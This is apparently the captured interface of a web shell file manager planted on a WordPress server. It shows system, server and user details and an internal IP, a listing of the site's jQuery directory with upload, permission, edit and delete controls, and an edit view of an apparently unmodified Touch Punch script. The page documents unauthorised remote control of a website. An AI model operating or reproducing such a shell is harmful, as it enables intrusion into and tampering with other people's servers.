[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
js
/
jquery
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 ui
SET
[ DEL ]
📄 jquery-migrate.js
31,978 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery-migrate.min.js
13,577 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.color.min.js
6,645 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.form.js
41,911 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.form.min.js
15,977 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.hotkeys.js
5,617 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.hotkeys.min.js
1,793 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.js
285,334 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.masonry.min.js
1,819 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.min.js
87,553 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.query.js
3,694 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.schedule.js
3,457 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.serialize-object.js
769 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.table-hotkeys.js
3,752 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.table-hotkeys.min.js
2,295 B
SET
[ EDIT ]
|
[ DEL ]
📄 jquery.ui.touch-punch.js
1,179 B
SET
[ EDIT ]
|
[ DEL ]
📄 suggest.js
6,991 B
SET
[ EDIT ]
|
[ DEL ]
📄 suggest.min.js
2,993 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: jquery.ui.touch-punch.js
/*! * jQuery UI Touch Punch 0.2.2 * * Copyright 2011, Dave Furfero * Dual licensed under the MIT or GPL Version 2 licenses. * * Depends: * jquery.ui.widget.js * jquery.ui.mouse.js */ (function(b){b.support.touch="ontouchend" in document;if(!b.support.touch){return}var c=b.ui.mouse.prototype,e=c._mouseInit,a;function d(g,h){if(g.originalEvent.touches.length>1){return}g.preventDefault();var i=g.originalEvent.changedTouches[0],f=document.createEvent("MouseEvents");f.initMouseEvent(h,true,true,window,1,i.screenX,i.screenY,i.clientX,i.clientY,false,false,false,false,0,null);g.target.dispatchEvent(f)}c._touchStart=function(g){var f=this;if(a||!f._mouseCapture(g.originalEvent.changedTouches[0])){return}a=true;f._touchMoved=false;d(g,"mouseover");d(g,"mousemove");d(g,"mousedown")};c._touchMove=function(f){if(!a){return}this._touchMoved=true;d(f,"mousemove")};c._touchEnd=function(f){if(!a){return}d(f,"mouseup");d(f,"mouseout");if(!this._touchMoved){d(f,"click")}a=false};c._mouseInit=function(){var f=this;f.element.bind("touchstart",b.proxy(f,"_touchStart")).bind("touchmove",b.proxy(f,"_touchMove")).bind("touchend",b.proxy(f,"_touchEnd"));e.call(f)}})(jQuery);